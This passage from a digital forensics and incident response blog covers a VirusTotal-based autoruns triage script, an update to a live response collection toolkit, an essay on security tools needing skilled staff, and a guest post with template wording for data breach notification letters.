<span style="font-size: large;">buatapa (by default) only looks at unsigned entries, but it also attempts to identify abnormal Unicode characters (anything that is not Windows CP-1252) as well as trying to look for entries that are similar to poweliks. You can change the defaults by giving the script different arguments, which can be seen the -h or --help flag.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFiainkpfq4RV70eo4Vjbln69HB3YJfT4T-yAnR5gal3hvO7rqeyux4kPIPFnR1FB8SCoa_gVdkJZtaFmU5IrjrFmpQYS3eHFiLSi74E2iQTu2aeEuUy0tVXkRMRX06HylsTVmI_7K5Nts/s1600/buatap-usage.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFiainkpfq4RV70eo4Vjbln69HB3YJfT4T-yAnR5gal3hvO7rqeyux4kPIPFnR1FB8SCoa_gVdkJZtaFmU5IrjrFmpQYS3eHFiLSi74E2iQTu2aeEuUy0tVXkRMRX06HylsTVmI_7K5Nts/s640/buatap-usage.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">buatapa usage</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<br />
<br />
<span style="font-size: large;">buatapa is by no means meant to replace in-depth analysis; it is meant to provide a faster and easier way to identify potentially compromised systems. buatapa will likely not be able to identify incredibly well-hidden rootkits, digitally-signed malware or never seen before malware, as it is not meant to do that. It is meant to rapidly provide an easy to read list of files that have been identified by VirusTotal as likely being malware that is set to automatically run in an area recognized by autoruns. It will provide you a "quick-win" in identifying the "low hanging fruit" malware. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">As I have said many times in the past (and will continue to say many times in the future) the malware will only be as sophisticated as it needs to be in order to gain access to the data your adversaries are after. If a piece of malware originally written four years ago can steal every credit card transaction in your environment, the adversary will use it. They will not use their "next generation Cloud 2.0 automatic exfiltration memory-only kernel-level rootkit" malware in the event that it might actually get discovered in an environment where very basic malware would suffice. <a href="http://www.brimorlabsblog.com/2014/09/spending-on-hardware-wont-fix.html" target="_blank">Remember the third party vendor used by Goodwill to process payments last year?</a> The malware that was allegedly used in that compromise displayed every single transaction in a command prompt window and had no method of persistence. If the window had simply been closed by ANY individual, even by accident, or if the system was rebooted, the compromise would have stopped. Hardly "advanced" or "sophisticated", but the malware <a href="http://krebsonsecurity.com/2014/09/breach-at-goodwill-vendor-lasted-18-months/" target="_blank">allegedly ran for 18 months</a> and resulted in <a href="http://www.darkreading.com/backoff-not-to-blame-for-goodwill-breach/d/d-id/1306963" target="_blank">868,000 compromised credit cards</a>.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span><br />
<span style="font-size: large;">buatapa_0_0_7.zip - <a href="https://www.brimorlabs.com/Tools/Scripts/Python/buatapa_0_0_7.zip" target="_blank">download here</a> </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">MD5: 8c2f9dc33094b3c5635bd0d61dbeb979</span><br />
<span style="font-size: large;">SHA-256: c1f67387484d7187a8c40171d0c819d4c520cb8c4f7173fc1bba304400846162</span><br />
<span style="font-size: large;">Version 0.0.7</span><br />
<span style="font-size: large;">Updated: January 30, 2018</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">If you encounter any bugs or any have suggestions or feedback on the tool, please do not hesitate to let me know!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span><span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com0tag:blogger.com,1999:blog-1547389155659419533.post-766462701757596742015-08-20T09:12:00.000-04:002019-10-17T11:16:43.362-04:00...at long last, updates to the Live Response Collection!!<br />
<br />
<span style="font-size: large;">Hello again readers! I am happy to announce, after many long months in development (and due to a pretty busy six months, about six months later than I had originally planned) an updated version of the Live Response Collection is available!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The first item that you will probably note is the Windows folder looks very different. I wanted to provide a cleaner look for users, so when you run the LRC against a system it is easier to find the output folder. By having four main folders, instead of about 35, the results will be much easier to see. I moved all of the "tools" into the folder cleverly named "Tools", and all of the scripts into the similarly cleverly named folder "Scripts". While this does not change the function of the tools, it does slightly change file paths leveraged by the old scripts, so you will have to update any custom changes that you made for your environment.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFyzBVGQR9a2znuOQwHWzB2zDwoDHA3zBWh42ZtASLiOJ4wTF6BfazVvD9hmWqwmI2vD5cIfxw5jJ62KS57eHGoLTyVjk1jd086j8N6ZPkQ2AJrCb0ee4oS63epgdxEGOP3dDfBxul9zJQ/s1600/NewWindowsFolderStructure.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFyzBVGQR9a2znuOQwHWzB2zDwoDHA3zBWh42ZtASLiOJ4wTF6BfazVvD9hmWqwmI2vD5cIfxw5jJ62KS57eHGoLTyVjk1jd086j8N6ZPkQ2AJrCb0ee4oS63epgdxEGOP3dDfBxul9zJQ/s640/NewWindowsFolderStructure.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">New Windows folder structure</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Within the "Scripts" folder I also began the process of what I am calling "Modules", which I started for several reasons. Since all six scripts share a lot of code and functionality, I wanted to reduce the overall size of each file by leveraging code that they share. It makes the maintenance and updates for the LRC easier. It also allows easier user customization, because instead of trying to figure out which large section of code they want to use (or not to use) you can just choose to skip a module completely if you don't want it by replacing the name within the code itself. I plan on writing a future post in the future detailing just how easy it is to write a customized module, complete with a breakout of the variables that the script(s) rely on, so users can add functionality and features easier than ever (<hint hint> and hopefully you share them for inclusion into a future LRC release!)</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJK5u0mVsx9YL1bw6AIq7qAmLQ-PCMs773GoIP0CeUKUvMTBIsjDJLRPr3xUDrI_dJ3mHicOlVWLCKEgyvZzGHIIeWsKyQgPfLBWbtpm1qPeS4JyxgKaeEazJ1oo9KljknmZC_vBCKI7gN/s1600/CurrentModules.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJK5u0mVsx9YL1bw6AIq7qAmLQ-PCMs773GoIP0CeUKUvMTBIsjDJLRPr3xUDrI_dJ3mHicOlVWLCKEgyvZzGHIIeWsKyQgPfLBWbtpm1qPeS4JyxgKaeEazJ1oo9KljknmZC_vBCKI7gN/s640/CurrentModules.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>The beginnings of LRC "modules". There will be more!</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">As I stated, the overall functions of the LRC did not change terribly much, some Startup folder hashing was added as well as also saving autoruns output to csv, which will be touched on in my next blog post. The next post will also be the public release of a tool that is also several months in the making, but also several months later than I had originally anticipated to release it. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span><br />
<a href="https://www.brimorlabs.com/Tools/LiveResponseCollection-Cedarpelta.zip" style="font-size: x-large;" target="_blank">LiveResponseCollection-Cedarpelta.zip - download here</a><span style="font-size: large;"> </span><br />
<br style="font-size: x-large;" />
<span style="font-size: large;">MD5: 7bc32091c1e7d773162fbdc9455f6432</span><br />
<span style="font-size: large;">SHA256: 2c32984adf2b5b584761f61bd58b61dfc0c62b27b117be40617fa260596d9c63</span><br />
<span style="font-size: large;">Updated: September 5, 2019</span><br />
<div>
<span style="font-size: large;"><br /></span></div>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com0tag:blogger.com,1999:blog-1547389155659419533.post-83062445650695178402015-07-14T09:16:00.002-04:002015-07-16T10:27:47.299-04:00Gardening, cyber security, and YOU!<br />
<span style="font-size: large;">Hello again readers! We spent the first week of July on vacation in North Carolina and then I spent a few days last week at the SANS DFIR Summit in Austin. I was going to write a small recap of the DFIR Summit but I think Matt Bromiley summed it all up pretty <a href="http://www.505forensics.com/2015-dfir-summit/" target="_blank">well in his post</a> and I don't have much more to add, other than my favorite part of the DFIR Summit is actually seeing friends and colleagues in person and of course the sheer amount of networking opportunities. I personally would like to see more time allotted for networking, but there are so many quality presenters that it would be a shame to have fewer presentations.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">This blog post is going to cover some additional thoughts that I had on the impromptu Incident Response panel on which I participated, led by <a href="https://twitter.com/carrier4n6" target="_blank">Brian Carrier</a>, and also included <a href="https://twitter.com/littlemac042" target="_blank">Frank McClain</a> and <a href="https://twitter.com/rwallace46" target="_blank">Rob Wallace</a>. One of the comments that I made regarding expensive cyber security tools was akin to "you can buy a screwdriver, but you cannot set it on a table and have it magically build you a house". Likewise, it doesn't matter how effectively written or well-thought out a tool is, at the end of the day, it is simply a tool. The functionality and quality of information (or work) that is produced by that tool is entirely dependent on the human that uses it. I could buy the most expensive, top-of-the-line, hammers, screwdrivers, saws, levels, shims (also a type of cache), nails, screws, and so on, but at the end of the day I do not have the skills needed to build a house. In fact, building Lego sets is about the extent of my construction capabilities. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Unfortunately a lot of vendors market their tool(s) as an "end-all-be-all solution". A lot of decision makers for businesses see this and decide to buy the latest and greatest tool but do not make any investment into the needed individuals to really harness the power of the tool. (My Cyber-Business-Guru/friend, Jack, would note that the mistake is assuming that the tool is a cost-savings over hiring expensive personnel. <b>You Must Have Both!</b>) </span><span style="font-size: large;">A good parallel with this can be made regarding our garden and our time away from home over the past few weeks; as you often come back to a garden that is completely unrecognizable from the one that you initially had.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Imagine that a vendor salesperson comes in and pitches the "EXTREME Cyber Security Protector 3000XL" as being able to "stop threats before they happen, in real-time, allowing instantaneous cyber security protection....(and a few other random buzzwords...synergy...end-to-end solution, cost savings, win-win, force multiplier...)". Of course the salesperson makes a great presentation (otherwise they would not be in sales long) and management decides to buy it.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<span style="font-size: large;"></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: large;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlTqQfg1l0uo5IjO1Rxs5M6KPUYIiTOEGW2eBlXpnnOrop6AC2ipgAlVI5SBhlt6RLvwcJ_ChgLg1T7GE7fDnq4J2IyUkiuh1_nuhG5VA6L3FEjb9x4VXB6bokJry799DV1bg1l-BBVpMe/s1600/shut-up-and-take-my-money.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlTqQfg1l0uo5IjO1Rxs5M6KPUYIiTOEGW2eBlXpnnOrop6AC2ipgAlVI5SBhlt6RLvwcJ_ChgLg1T7GE7fDnq4J2IyUkiuh1_nuhG5VA6L3FEjb9x4VXB6bokJry799DV1bg1l-BBVpMe/s640/shut-up-and-take-my-money.jpg" width="640" /></a></span></div>
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Sure, initially the tool may work fine, but these tools are never meant to be a "set it and forget it" solution. The same can be said about our garden. We kept up on doing regular maintenance, watering, and weeding our garden up until we went on vacation, so it looked similar to this despite our "purchase"* of the most <a href="http://www.amazon.com/PAW-44022-Electric-Battery-Wheelbarrow/dp/B00E2GKKMG" target="_blank">expensive wheelbarrow that I could find</a>:</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6Tu6IXO_g2CvdRkRcp4WyveklWYjBiXaRnhQr7iqf4GRPXLk1t9kG4jaDmS5Wy3dwlm5tsN69lSD-NcPAgqWol0eVkILGVtRarZ9KjarNCRFtzZE5W9VStLdHmj2pdhK0HavLPXOwXN8B/s1600/marigolds-newly-planted-in-the-vegetable-garden.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6Tu6IXO_g2CvdRkRcp4WyveklWYjBiXaRnhQr7iqf4GRPXLk1t9kG4jaDmS5Wy3dwlm5tsN69lSD-NcPAgqWol0eVkILGVtRarZ9KjarNCRFtzZE5W9VStLdHmj2pdhK0HavLPXOwXN8B/s640/marigolds-newly-planted-in-the-vegetable-garden.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><div style="text-align: center;">
<span style="font-size: small;"><i>Newly planted garden. Retrieved July 13, 2015 from http://www.livecreativelyinspired.com/wp-content/uploads/2014/07/marigolds-newly-planted-in-the-vegetable-garden.jpg</i></span></div>
<div>
<span style="font-size: large;"><br /></span></div>
</td></tr>
</tbody></table>
<br />
<span style="font-size: large;">So far, so good, right? Well, <strike>we got quite a bit of rain</strike> it rained Miracle Grow for weeds while we were gone, and upon returning home we got even more rain on a regular basis. Due to all of the precipitation, we did not have an opportunity until this past weekend to perform the needed upkeep to get rid of the weeds and ensure we have a nice garden with the flowers and shrubs that we want, not milkweed, $#&%*! kudzu, and other weeds that we do not want. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkZN5-78wHlw6O4IR816CuXoA5igEUmWu7OmT8lSP4p6olsV-HoaF437aHqd_BTw59oar7r5GPYt8IQARBf_yt6K9-uGKplOpXFBudMUPizx4LJMjEeeZcgoM-bVNHqaAIA9eTEZb8Xq0H/s1600/20100716garden2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="478" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkZN5-78wHlw6O4IR816CuXoA5igEUmWu7OmT8lSP4p6olsV-HoaF437aHqd_BTw59oar7r5GPYt8IQARBf_yt6K9-uGKplOpXFBudMUPizx4LJMjEeeZcgoM-bVNHqaAIA9eTEZb8Xq0H/s640/20100716garden2.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>But ... we bought an expensive wheelbarrow. How did this happen?? Retrieved July 13, 2015 from http://www.waldeneffect.org/20100716garden2.jpg</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">I think that this is a perfect parallel; as we have to perform regular maintenance on the garden to ensure that we have the plants that we want (ie our network, our data,) or else we end up with something that is overrun with weeds and out of control (malware, toolbars, scareware). Having a good team of individuals helping ensure your "garden" (network and devices) is secure, regardless of the tool(s) that is used is much more rewarding in the long run than spending large amounts of money on tools that just sit there and are rendered ineffective in a short period of time. In the end, it isn't about buying the fully automated, ridiculously expensive wheelbarrow, it is about the humans who filled it with the all of the unwanted items that were running rampant in our garden</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaCcIZ2pno3dwxI8Vv7NLuuPRQihwd5Zu7pEe9G_Jp7PKAqbjuog-fyhpvSrKwH5Qf_lT4a_HfyX8aTTCKAdMgwlH7pYbNJYgYWCZ7qhdbbVK0c5RkmqEwMOVbWwcx2Mzuh-0KJGJrPa6i/s1600/weed-wagon.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaCcIZ2pno3dwxI8Vv7NLuuPRQihwd5Zu7pEe9G_Jp7PKAqbjuog-fyhpvSrKwH5Qf_lT4a_HfyX8aTTCKAdMgwlH7pYbNJYgYWCZ7qhdbbVK0c5RkmqEwMOVbWwcx2Mzuh-0KJGJrPa6i/s640/weed-wagon.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Now where do you want this malware (weeds)? Retrieved July 13, 2015 from http://www.summerhouseart.com/blog/wp-content/uploads/2010/03/weed-wagon.jpg</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">*FULL DISCLAIMER: We did not really purchase the battery powered wheelbarrow and the photos above are not of our garden or our wheelbarrow. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com0tag:blogger.com,1999:blog-1547389155659419533.post-41983753063740616162015-06-16T10:05:00.000-04:002015-06-16T10:05:26.277-04:00How to Have that Awkward Conversation<span style="font-size: large;"><br /></span>
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Hello again readers!! Today's post is the first (but most certainly not the last) "guest post" in which friends and colleagues can share their experiences and insights and give alternate perspectives on digital forensics, incident response, and information security. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Today's post is authored by my friend "Jack" who has much more experience (and an MBA) on the "business" side of forensics and incident response than I ever will (and let's be honest, I also will never have an MBA). "Jack" may or may not also be in the Witness Protection Program, but the OPM data breach might change that.....</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><i>(PS: Apparently cat memes are the number one attraction to blog posts, according to 87 out of 100 business professionals. The other 13 were no doubt scouring the internet for other pictures of cats.)</i></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span><br />
<div style="text-align: center;">
<span style="font-size: large;"><b>How to Have that Awkward Conversation</b></span></div>
<br />
<div style="text-align: center;">
<span style="font-size: large;"><b>By: "Jack"</b></span></div>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">NO, not the “It’s not you; it’s me!” one. The one where you tell your employees (or clients!) that you’ve been hacked, their information is who-knows-where, and oh by the way, you’ve got no idea how the bad guys even got in. You know. THAT one. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">I’m not going to sugarcoat this. It’s going to be painful. It’s going to be embarrassing. But just like adults always tell kids, it is better to hear it directly from you. If the news media or banking institutions are notifying victims instead… oh boy; it’s a public relations nightmare. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">First rule of Data Breach Club: Talk first and say it loud. No one likes being indoctrinated into Data Breach Club, but I’ll let you in on a little secret: It’s not an exclusive membership. You’re either in the club, or you don’t know you’re already in the club. </span><br />
<span style="font-size: large;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiEDuScWvfJD_oJ74xjQIqjMBHDpLAF0GHP3tvAsyPZjAalXZ0ELZSzcQBcGIf_Tk0cGvo_L7txwwnl4vmvXwC4cDfOGaWKr3l1CGSQ4liBhZEDEjj1_C3WLGRCwQ_fQRsD_7k7X-mp8Yk/s1600/soembarrassed.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiEDuScWvfJD_oJ74xjQIqjMBHDpLAF0GHP3tvAsyPZjAalXZ0ELZSzcQBcGIf_Tk0cGvo_L7txwwnl4vmvXwC4cDfOGaWKr3l1CGSQ4liBhZEDEjj1_C3WLGRCwQ_fQRsD_7k7X-mp8Yk/s400/soembarrassed.png" width="318" /></a></div>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"> </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">If you are upfront and honest, chances are better that you might maintain the relationships your organization has with its employees, partners, and clients. Further, you may not have a choice about public disclosure, or private disclosure, depending on contracts you have with clients. Depending on the laws where you operate, you may be obligated to provide full disclosure within a certain time period. Most state breach notification laws don’t specify what your notification should include; however there are some minimum guidelines which we attempt to cover in our samples below. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">In the State of Maryland for example, the Attorney General’s website says the following about data breach notifications:</span><br />
<span style="font-size: large;"><br /></span>
<br />
<div style="text-align: center;">
<i>Once a security breach is detected, a business must conduct in good-faith a reasonable and prompt investigation to determine whether the information that has been compromised has been or is likely to be misused, i.e. for identity theft. If the investigation shows that there is a reasonable chance that the data will be misused, that business must notify the affected consumers. </i></div>
<div style="text-align: center;">
<i>In the event of a security breach, notice must be given to consumers as soon as reasonably practicable following the investigation. A business may delay notification if requested by a law enforcement agency or to determine the scope of the breach, identify all the affected individuals or restore the integrity of the system. Notice to affected consumer must be given in writing and sent to the most recent address of the individual, or by telephone to the most recent phone number. Notice may be sent via e-mail if an individual has already consented to receive electronic notice or the business primarily conducts its business via the Internet. The law also contains a provision for substitute notice, allowing a business to provide notice of a security breach by e-mail, posting on its website and notice to statewide media if the cost of notice would exceed $100,000 or the number of consumers to be notified exceeds 175,000 individuals. (<a href="https://www.oag.state.md.us/idtheft/businessGL.htm">https://www.oag.state.md.us/idtheft/businessGL.htm</a>)</i></div>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Searching online for “data breach disclosure laws AND [your location]” should net you some relevant results. When in doubt, call a lawyer that specializes in data breaches. If the Google can’t find one, your local Bar Association should be able to assist you. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg09GDw39-BW6LU1e703Ey89N1ctIUzTQOC-rIJ2o_gUL73OjJEObWlnXZZAKrIuiVHhqkD4CVKjghVZi1PS21osPesu42d1vfhJON3JP2m-0RXLtGL6WrQb_nv2maGpKw66rQHQSiRwnPd/s1600/rightmeow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg09GDw39-BW6LU1e703Ey89N1ctIUzTQOC-rIJ2o_gUL73OjJEObWlnXZZAKrIuiVHhqkD4CVKjghVZi1PS21osPesu42d1vfhJON3JP2m-0RXLtGL6WrQb_nv2maGpKw66rQHQSiRwnPd/s400/rightmeow.png" width="231" /></a></div>
<span style="font-size: large;"><br /></span>
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">So how do you begin that notification email? Your letter should contain some version of the following:</span><br />
<span style="font-size: large;"><i>[ ] denote areas where you should fill in the blank</i></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Part I—Introduce the Problem and Accept Responsibility: You need to be upfront and honest; if you have a lawyer advising differently, find a new lawyer (<i>Preferably one you suspect has a secret identity and fights crime at night using heightened senses resultant from a hazardous chemical spill; but I suppose if you can’t find one, any ethical data breach lawyer will do.</i>) If you don’t know something, say so. Trying to hide the fact that you don’t know something just makes you look like you are hiding something, which is usually assumed to be more sinister. Also, please don’t place blame on nation-states for a mess of your own creation; you’ll end up looking ridiculous and becoming the Poster Child of “What NOT to do”. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><i>“We are contacting you because on [insert discovery date] we discovered a serious cyber-security incident that occurred between [Start Date] and [End Date] that involved a breach of your [personal information, such as medical records, credit card numbers, passwords, etc…]. At this time we do not believe that [other personal information] was accessed. We know you have trusted us with your information and we take that trust seriously. We take full responsibility for this incident and we will work tirelessly to resolve it quickly and completely.”</i></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">And if you delayed in sending notifications to victims, say why:</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><i>“In accordance with applicable laws, we delayed notification of affected parties by 30 days, due to an official request by law enforcement.”</i></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Part II—Here’s What Is Happening Now: This is where you tell them what you are doing do fix this problem. (Not diverting attention, not doing just enough to get regulators off your back, not putting on a show to restore stock prices, not doing the minimum for regulatory compliance or limiting your liability. Actually fixing the problem. Let me say it again for dramatic effect: </span><b><u><span style="font-size: x-large;">Actually.Fixing.The.Problem.</span></u></b><span style="font-size: large;">) </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh73HC8r6UIalO_H0qrvLVGPm630BUQBxmbiUxPEAtDPK-gSTEGBE9ei7ZH8YZfDsrXx-utOPm518dcuYViBJYJ79_I8VENayRKi9RxkrO0YsAVowg1td4QpGWILgY6M6gS-EMCc6Z1885J/s1600/dramatic.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh73HC8r6UIalO_H0qrvLVGPm630BUQBxmbiUxPEAtDPK-gSTEGBE9ei7ZH8YZfDsrXx-utOPm518dcuYViBJYJ79_I8VENayRKi9RxkrO0YsAVowg1td4QpGWILgY6M6gS-EMCc6Z1885J/s400/dramatic.png" width="400" /></a></div>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">You’ll want to (or be required to) at least cover what you did to stop the attackers, what you are doing to clean-up the breach, and what changes you will make in the future. Your notification should say some version of the following, pick and choose based on your circumstances: </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><i>“Upon discovery we immediately blocked the offending IPs and shut down all out-bound traffic. We have begun the process of finding compromised machines.”</i></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><i>“We brought in cyber-security experts to investigate and fix this problem entirely and to ensure that we are more secure in the future.” </i> </span><br />
<span style="font-size: large;"><br /></span><span style="font-size: large;"><i>“We advised the credit reporting bureaus and banks of this incident. We are offering a free credit report to every affected party, and here’s how to do that. [Instructions here.]” </i></span><br />
<span style="font-size: large;"><i><br /></i></span>
<span style="font-size: large;"><i>“We are cooperating fully with law enforcement and an investigation is on-going. There will be full participation and transparency during the investigation. Employees will be contacted in person if their assistance is required. Do not provide any personal information, account numbers or passwords to any unverified person via email or on the phone, now or ever.”</i></span><br />
<span style="font-size: large;"><i><br /></i></span>
<span style="font-size: large;"><i>“We are currently dedicating money to invest in our IT infrastructure, our security personnel, and monitoring tools so that attacks in the future are thwarted.”</i></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Part III—Here’s What the User Has to Do: This is where you tell your employees, clients, customers, and/or Partners what they need to do. You must be exceedingly firm about password changes and policy enforcement while at the same time making this VERY easy for them. It’s a huge component of rebuilding trust and being transparent throughout the process. You’ll want to take note of the inclusion of an attachment, which should detail cyber-security best practices that they can use at work or at home. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><i>“You will be required to choose a new password before you can log into your account. <u>Everyone must do this</u>, from the newest employee to the CEO of the company—even every member of the IT team to include admin accounts. It may NOT be the same password as last time. Your password will be required to have upper and lower case letters, a number, and a symbol. You cannot use dictionary words. It must also be at least 8 characters in length. <u>We apologize for the inconvenience, but this is a very important part of information security.</u> It removes the attacker’s access to our network. <u>Thoroughness of this step is paramount.</u>” </i> </span><br />
<span style="font-size: large;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
